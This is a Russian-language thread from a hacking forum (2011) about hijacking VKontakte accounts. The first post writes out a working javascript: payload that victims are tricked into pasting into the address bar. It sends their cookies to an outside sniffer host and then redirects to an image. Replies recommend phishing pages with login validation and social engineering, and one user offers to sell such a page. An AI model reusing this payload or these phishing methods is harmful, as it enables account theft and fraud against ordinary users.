ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   проблема взлома вконтакте (https://forum.antichat.xyz/showthread.php?t=8050586)

rushx 29.11.2011 01:00
вообщем придумал способ как можно грамотно жертве впарить ссылку прямо в адресную строку. только проблема в том что куки не приходят, или у жертвы ссылка не открывается (говорят просто белая страница)
ссылку пишу вот эту javascript:document.write('img = new Image(); img.src = "http://httpz.ru/n8brbzadzlt.gif?"+document.cookie;var URL = "http://images.cards.mail.ru/11bolprivet.jpg";var speed = 8000;function reload() {document.location = URL}setTimeout("reload()", speed);')

причем когда я по ней перехожу, то у меня все нормально и в сниффере мой вход отображается, и куки лежат

Kzooz 29.11.2011 01:00
Тебе cookies ничего не дадут. Они уже давно привязаны к ip адресу.

Yorvet 30.11.2011 01:00
Вот сейчас некоторые товарищи побегут помощи ради проверять код, вставляя его в адресную строку. Действительно, нашёл способ грамотно впарить ссылку напрямую
А вообще, куки контакта с недавнего времени уже нет смысла воровать. Гораздо полезнее использовать снифер.

rushx 30.11.2011 01:00
объясните пожалуйста по-подробнее. разве сниффер используется не для того что бы воровать куки?
а к ip кукисы привязаны вообще везде или на самом контакте?

зы: если сниффер для взлома контакта не вариант, скажите тогда пожалуйста самый актуальный способ на сегодня... погуглю( только не си)

Yorvet 30.11.2011 01:00
Снифер это способ получения данных от пользователя. Кроме кукисов он может передавать и другую информацию, например данные об IP, браузере, системе, дате перехода по ссылке, откуда был совершён переход, а так же любую введённую после определённой команды информацию (как это делает скрипт для фейков).

По поводу привязки не знаю. Во всяком случае, для взлома контакта лучше использовать фейки. Это и есть самый актуальный способ и на сегодня, и на вчера, и на завтра. А СИ в той или иной мере используется в любом способе взлома, без неё никуда.

Nick Hander 30.11.2011 01:00
По поводу привязки не знаю. Во всяком случае, для взлома контакта лучше использовать фейки. Это и есть самый актуальный способ и на сегодня, и на вчера, и на завтра. А СИ в той или иной мере используется в любом способе взлома, без неё никуда.
Да, качественный фейк - самый рациональный и актуальный способ увода аккаунта вконтакте. Либо может еще есть дорогущие приватные способы взлома вконтакте. Кстати, если нужен качественный приватный фейк вконтакте с валидацией логина-пароля, обращайтесь в личку, продам незадорого.

Yorvet 30.11.2011 01:00
Или здесь по соседству есть темка с фейком для контакта, который работает по сей день (имеющие мОзги да исправят ), только без валидации.


Время: 03:27